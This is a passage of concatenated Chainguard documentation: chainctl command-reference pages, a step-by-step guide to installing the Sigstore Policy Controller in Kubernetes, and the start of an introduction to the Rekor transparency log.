[--capabilities=CAPABILITY,...] [--parent=PARENT | --managed] [--output=id|json|table] Examples # List all accessible roles chainctl iam roles list # List all managed (built-in) roles chainctl iam roles list --managed # List all roles that can create groups chainctl iam roles list --capabilities=groups.create Options --capabilities strings A comma separated list of capabilities to grant this role. -h, --help help for list --managed Only list managed (built-in) roles. --name string The exact name of roles to list. --parent string Location to list roles from. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. 
(default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles - IAM role resource interactions. --- ### chainctl iam roles update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_iam_roles_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl iam roles update Update an IAM role. chainctl iam roles update ROLE_NAME|ROLE_ID [--capabilities=CAPABILITY,...] [--add-capabilities=CAPABILITY,...] [--remove-capabilities=CAPABILITY,...] [--description=DESCRIPTION] [--yes] [--output=id|json|table] Examples # Update a role with a complete set of capabilities chainctl iam roles update my-role --capabilities=policy.list,groups.list,identity.list # Add new capabilities to a role chainctl iam roles update my-role --add-capabilities=policy.create # Remove an existing capabilities from a role chainctl iam roles update my-role --remove-capabilities=identity.list # Interactively choose capabilities to add to a role chainctl iam roles update my-role --add-capabilities= Options --add-capabilities strings A comma separated list of capabilities to add to this role (can't be used with --capabilities). --capabilities strings A comma separated list of capabilities to grant this role. --description string A description of the role. -h, --help help for update --remove-capabilities strings A comma separated list of capabilities to remove from this role (can't be used with --capabilities). -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl iam roles - IAM role resource interactions. --- ### chainctl images URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images Images related commands for the Chainguard platform. Options -h, --help help for images Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. 
(default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl images diff - Diff images. chainctl images history - Show history for a specific image tag. chainctl images list - List tagged images from Chainguard registries. chainctl images repos - Image repo related commands for the Chainguard platform. --- ### chainctl images diff URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_diff/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images diff Diff images. Synopsis Diffs 2 images together, based on their SBOM and Vulnerability scan. SBOM packages are diffed based on their PURL (https://github.com/package-url/purl-spec) and version. PURLs are grouped without their @version component. If identical PURLs are found, the first one found is used. If an SBOM package contains multiple PURLs, results will contain multiple entries for the same package name based on the purl type. Vulnerability scans are done via grype, which must be available on the system PATH. chainctl images diff FROM_IMAGE TO_IMAGE [flags] Options -t, --artifact-types strings Specifies the purl artifact types to diff. If "-" is provided, all types are included. (default [apk]) -h, --help help for diff --platform string Specifies the platform in the form os/arch (e.g. linux/amd64, linux/arm64) (default "linux/amd64") Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images - Images related commands for the Chainguard platform. --- ### chainctl images history URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_history/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images history Show history for a specific image tag. Synopsis Show history for a specific image tag. If a digest does not represent a multi-arch image, only a single digest without architecture information will be displayed. Architecture information may not be available for all digests. 
Examples: Show history for a specific tag (selected interactively) chainctl images history nginx Show history for a specific tag (specified in the command) chainctl images history nginx:1.21.0 Show history for a tag in a specific organization chainctl images history nginx:1.21.0 --parent=my-org chainctl images history IMAGE[:TAG] [flags] Options -h, --help help for history --parent string Organization to view image history from Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images - Images related commands for the Chainguard platform. --- ### chainctl images list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images list List tagged images from Chainguard registries. chainctl images list [--repo=REPO_NAME] [--public | --parent=PARENT_NAME|PARENT_ID] [--updated-within=DURATION] [--show-dates] [--show-epochs] [--show-referrers] [--output=csv|id|json|table|terse|tree|wide] Options -h, --help help for list --parent string The name or id of the parent location to list image repos. --public List repos from the public Chainguard registry. --repo string Search for a specific repo by name. --show-dates Whether to show date tags of the form latest-{date}. --show-epochs Whether to show epoch tags of the form 1.2.3-r4. --show-referrers Whether to show referrer tags of the form sha256-deadbeef.{sig,sbom,att}. --updated-within duration The duration within which an image must have been updated (0 disables the filter). Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images - Images related commands for the Chainguard platform. --- ### chainctl images repos URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos Image repo related commands for the Chainguard platform.
Options -h, --help help for repos Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images - Images related commands for the Chainguard platform. chainctl images repos build - Manage custom image builds chainctl images repos list - List image repositories. --- ### chainctl images repos build URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_build/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos build Manage custom image builds Options -h, --help help for build Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images repos - Image repo related commands for the Chainguard platform. chainctl images repos build apply - Apply a build config chainctl images repos build edit - Edit a build config chainctl images repos build list - List build reports chainctl images repos build logs - Get build logs --- ### chainctl images repos build apply URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_build_apply/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos build apply Apply a build config chainctl images repos build apply [flags] Options -f, --file string The name of the file containing the build config. -h, --help help for apply --parent string The name or id of the parent location to apply build config. --repo string The name or id of the repo to apply build config. -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. 
--console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images repos build - Manage custom image builds --- ### chainctl images repos build edit URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_build_edit/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos build edit Edit a build config chainctl images repos build edit [flags] Options -h, --help help for edit --parent string The name or id of the parent location to apply build config. --repo string The name or id of the repo to apply build config. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images repos build - Manage custom image builds --- ### chainctl images repos build list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_build_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos build list List build reports chainctl images repos build list [--parent ORGANIZATION_NAME | ORGANIZATION_ID | FOLDER_NAME | FOLDER_ID] [flags] Options -h, --help help for list --parent string The name or id of the parent location to list build reports. --repo string Search for a specific repo by name, or ID. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. 
SEE ALSO chainctl images repos build - Manage custom image builds --- ### chainctl images repos build logs URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_build_logs/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos build logs Get build logs chainctl images repos build logs [flags] Options --build-id string The id of the build to get logs for. -h, --help help for logs --parent string The name or id of the parent location to get build logs. --repo string The name or id of the repo to get build logs. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images repos build - Manage custom image builds --- ### chainctl images repos list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_images_repos_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl images repos list List image repositories. chainctl images repos list [--repo=REPO_NAME] [--public | --parent=PARENT_NAME|PARENT_ID] [--updated-within=DURATION] [--show-dates] [--show-epochs] [--show-referrers] Options -h, --help help for list --parent string The name or id of the parent location to list image repos. --public List repos from the public Chainguard registry. --repo string Search for a specific repo by name. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl images repos - Image repo related commands for the Chainguard platform. --- ### chainctl libraries URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl libraries Ecosystem library related commands. Options -h, --help help for libraries Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. 
(default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl libraries entitlements - Manage entitlements to language ecosystem libraries. --- ### chainctl libraries entitlements URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries_entitlements/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl libraries entitlements Manage entitlements to language ecosystem libraries. Options -h, --help help for entitlements Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl libraries - Ecosystem library related commands. chainctl libraries entitlements list - List entitlements of an organization. --- ### chainctl libraries entitlements list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_libraries_entitlements_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl libraries entitlements list List entitlements of an organization. chainctl libraries entitlements list --parent=PARENT [--output=json|table] [flags] Options -h, --help help for list --parent string The name or id of the org to list an entitlements for. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl libraries entitlements - Manage entitlements to language ecosystem libraries. 
--- ### chainctl packages URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl packages Interact with Chainguard packages Options -h, --help help for packages Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control chainctl packages versions - Package version related commands for the Chainguard platform. --- ### chainctl packages versions URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages_versions/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl packages versions Package version related commands for the Chainguard platform. Options -h, --help help for versions Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl packages - Interact with Chainguard packages chainctl packages versions list - List package version data from Chainguard repositories. --- ### chainctl packages versions list URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_packages_versions_list/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl packages versions list List package version data from Chainguard repositories. chainctl packages versions list PACKAGE_NAME [--show-eol] [--show-active] [--show-fips] [--output=csv|json|table|wide] Options -h, --help help for list --show-active Show only active versions. --show-eol Show only EOL versions. --show-fips Show only FIPS versions. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. 
(default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl packages versions - Package version related commands for the Chainguard platform. --- ### chainctl update URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_update/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl update Update chainctl. chainctl update [--yes] [--force] Options --force Skip the version check and update chainctl regardless of the current version. -h, --help help for update -y, --yes Automatic yes to prompts; assume "yes" as answer to all prompts and run non-interactively. Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control --- ### chainctl version URL: https://edu.chainguard.dev/chainguard/chainctl/chainctl-docs/chainctl_version/ Last Modified: June 30, 2025 Tags: chainctl, Reference, Product chainctl version Prints the version chainctl version [flags] Options -h, --help help for version Options inherited from parent commands --api string The url of the Chainguard platform API. (default "https://console-api.enforce.dev") --audience string The Chainguard token audience to request. (default "https://console-api.enforce.dev") --config string A specific chainctl config file. Uses CHAINCTL_CONFIG environment variable if a file is not passed explicitly. --console string The url of the Chainguard platform Console. (default "https://console.chainguard.dev") --force-color Force color output even when stdout is not a TTY. --issuer string The url of the Chainguard STS endpoint. (default "https://issuer.enforce.dev") --log-level string Set the log level (debug, info) (default "ERROR") -o, --output string Output format. One of: [csv, env, id, json, none, table, terse, tree, wide] -v, --v int Set the log verbosity level. SEE ALSO chainctl - Chainguard Control --- ## Section: 2 ### How to Install Sigstore Policy Controller URL: https://edu.chainguard.dev/open-source/sigstore/policy-controller/how-to-install-policy-controller/ Last Modified: May 10, 2024 Tags: policy-controller, Procedural The Sigstore Policy Controller is a Kubernetes admission controller that can verify image signatures and policies. You can define policies using the CUE or Rego policy languages. This guide will demonstrate how to install the Policy Controller in your Kubernetes cluster and enable policy enforcement. 
Prerequisites To follow along with this guide, you will need the following: A Kubernetes cluster with administrative access. You can set up a local cluster using kind or use an existing cluster. kubectl — to work with your cluster. Install kubectl for your operating system by following the official Kubernetes kubectl documentation. The Helm command line tool to install the Policy Controller. Once you have everything in place you can continue to the next step and install the Policy Controller. Step 1 — Creating the cosign-system Kubernetes Namespace The first step that you need to complete is to create a Kubernetes namespace for the Policy Controller to run in. Call it cosign-system and run the following command to create it: kubectl create namespace cosign-system Now you can move on to the next step, which is installing the Policy Controller into the namespace you just created. Step 2 — Installing the Policy Controller In this step we’ll use the helm command line tool to install the Policy Controller. First, add the Sigstore Helm Repository to your system with the following command: helm repo add sigstore https://sigstore.github.io/helm-charts You should receive output like this: "sigstore" has been added to your repositories Next, update your local Helm repository information using the helm repo update command: helm repo update You’ll receive output like the following: Hang tight while we grab the latest from your chart repositories... ...Successfully got an update from the "sigstore" chart repository Update Complete. ⎈Happy Helming!⎈ Now install the Policy Controller into the cosign-system namespace that you created in the first step of this guide: helm install policy-controller -n cosign-system sigstore/policy-controller --devel The --devel flag will include any alpha, beta, or release candidate versions of a chart. You can specify a particular version with the --version flag if you prefer. It may take a few minutes for your cluster to deploy all of the manifests needed for the Policy Controller. Check the status of your cluster using the kubectl wait command like this: kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-webhook && \ kubectl -n cosign-system wait --for=condition=Available deployment/policy-controller-policy-webhook Once the Policy Controller deployments are done you will receive output like the following: deployment.apps/policy-controller-webhook condition met deployment.apps/policy-controller-policy-webhook condition met A full list of the resources that the Policy Controller deploys into your cluster is available at the end of this guide in Appendix — Resource Types. You have now deployed the Policy Controller into your cluster. The next step is to enable it for the namespaces that you want to enforce policies in. Step 3 — Enabling the Policy Controller Now that you have the Policy Controller installed into your cluster, the next step is to decide which namespaces should use it. By default, namespaces must enroll into enforcement, so you will need to label any namespace that you will use with the Policy Controller. Run the following command to include the default namespace in image validation and policy enforcement: kubectl label namespace default policy.sigstore.dev/include=true Apply the same label to any other namespace that you want to use with the Policy Controller. 
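For example, to enroll an additional, hypothetical namespace named production in the same way:

kubectl label namespace production policy.sigstore.dev/include=true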
Now you can test enforcement by running a sample pod: kubectl run --image cgr.dev/chainguard/nginx:latest nginx The Policy Controller will deny the admission request with a message like the following: Error from server (BadRequest): admission webhook "policy.sigstore.dev" denied the request: validation failed: no matching policies: spec.containers[0].image cgr.dev/chainguard/nginx@sha256:628a01724b84d7db2dc3866f645708c25fab8cce30b98d3e5b76696291d65c4a The image is not admitted into the cluster because there are no ClusterImagePolicy (CIP) definitions that match it. In the next step you will define a policy that allows specific images and apply it to your cluster. Step 4 — Defining a ClusterImagePolicy Now that you have the Policy Controller running in your cluster, and have the default namespace configured to use it, you can define a ClusterImagePolicy to admit images. The following policy will allow any Chainguard Image hosted on the cgr.dev/chainguard registry to run on a cluster, while denying any other images. Open a new file with nano or your preferred editor: nano /tmp/cip.yaml Copy the following policy to the /tmp/cip.yaml file:

apiVersion: policy.sigstore.dev/v1beta1
kind: ClusterImagePolicy
metadata:
  name: chainguard-image-policy
spec:
  images:
  - glob: "cgr.dev/chainguard/**"
  authorities:
  - static:
      action: pass

The glob: "cgr.dev/chainguard/**" line in combination with the action: pass portion of the authorities section will allow any image in the cgr.dev/chainguard image registry to be admitted into your cluster. Save the file and then apply the policy: kubectl apply -f /tmp/cip.yaml You will receive output showing the policy is created: clusterimagepolicy.policy.sigstore.dev/chainguard-image-policy created Now run the cgr.dev/chainguard/nginx:latest image again: kubectl run --image cgr.dev/chainguard/nginx:latest nginx Since the image matches the policy, you will receive a message that the pod was created successfully: pod/nginx created Delete the pod once you're done experimenting with it: kubectl delete pod nginx To learn more about how the Policy Controller admits images, review the Admission of images page in the Sigstore documentation. Appendix — Resource Types A complete Policy Controller installation consists of the following resources in a cluster:

| Type | Name |
|------|------|
| ClusterRole | policy-controller-policy-webhook, policy-controller-webhook |
| ClusterRoleBinding | policy-controller-policy-webhook, policy-controller-webhook |
| ConfigMap | config-image-policies, config-policy-controller, policy-controller-policy-webhook-logging, policy-controller-webhook-logging |
| CustomResourceDefinition | clusterimagepolicies.policy.sigstore.dev |
| Deployment | policy-controller-policy-webhook, policy-controller-webhook |
| MutatingWebhookConfiguration | defaulting.clusterimagepolicy.sigstore.dev, policy.sigstore.dev |
| Role | policy-controller-policy-webhook, policy-controller-webhook |
| RoleBinding | policy-controller-policy-webhook, policy-controller-webhook |
| Secret | policy-webhook-certs, webhook-certs |
| Service | policy-webhook, policy-controller-policy-webhook-metrics, policy-controller-webhook-metrics, webhook |
| ServiceAccount | policy-controller-policy-webhook, policy-controller-webhook |
| ValidatingWebhookConfiguration | validating.clusterimagepolicy.sigstore.dev, policy.sigstore.dev |

--- ### An Introduction to Rekor URL: https://edu.chainguard.dev/open-source/sigstore/rekor/an-introduction-to-rekor/ Last Modified: August 20, 2022 Tags: Rekor, Overview An earlier version of this material was published in the Rekor chapter of the Linux Foundation Sigstore course.
Rekor stores records of artifact metadata, providing transparency for signatures and therefore helping the open source software community monitor and detect any tampering of the software supply chain. On a technical level, it is an append-only (sometimes called “immutable”) data log that stores signed metadata about a software artifact, allowing software consumers to verify that a software artifact is what it claims to be. You could think of Rekor as a bulletin board where anyone can post and the posts cannot be removed, but it’s up to the viewer to make informed judgements about what to believe. Transparency log Rekor’s role as a transparency log is the source of its security benefits for the software supply chain. Because the Rekor log is tamper-evident — meaning that any tampering can be detected — malicious parties will be less likely to tamper with the software artifacts protected by sigstore. In order to detect tampering, we can use monitors — software that examines the Rekor log and searches for anomalies — to verify that nothing has been manipulated outside of standard practices. Additionally, downstream users can search Rekor for signatures associated with signed artifact metadata, can verify the signature, and can make an informed judgment about what security guarantees to trust about a signed artifact. The Fulcio certificate authority enables a downstream user to trust that a public key associated with a particular artifact metadata entry from Rekor is associated with a particular identity, and Cosign performs this verification with a single convenient command. Public instance of Rekor A public instance of Rekor is run as a non-profit, public good transparency service that the open source software community can use. The service lives at https://rekor.sigstore.dev/. Those who are interested in helping to operate or maintain the Rekor public instance, or those who would like to discuss a production use case of the public instance can reach out via the mailing list. The latest Signed Tree hashes of Rekor are published on Google Cloud Storage. These are stored in both unverified raw and verified decoded formats; the signatures can be verified by users against Rekor’s public key. Entries include a short representation of the state of Rekor, which is posted to GCS, and can be verified by users against Rekor’s public key. These representations can be used to check that a given entry was in the log at a given time. Rekor usage Rekor provides a restful API based server for validation and a transparency log for storage, accessible via a command-line interface (CLI) application: rekor-cli. You can install rekor-cli with Go, which we will discuss in the lab section below. Alternatively, you can navigate to the Rekor release page to grab the most recent release, or you can build the Rekor CLI manually. Through the CLI, you can make and verify entries, query the transparency log to prove the inclusion of an artifact, verify the integrity of the transparency log, or retrieve entries by either public key or artifact. To access the data stored in Rekor, the rekor-cli requires either the log index of an entry or the universally unique identifier (UUID) of an artifact. The log index of an entry identifies the order in which the entry was entered into the log. Someone who wants to collect all the log entries or perhaps a large subset of the entries might use the log index, and receive an object as below, in their standard output. 
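For instance, an entry like the one shown below can be retrieved by its log index with rekor-cli (a sketch; the index value is illustrative, and the CLI defaults to the public Rekor instance):

rekor-cli get --log-index 100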
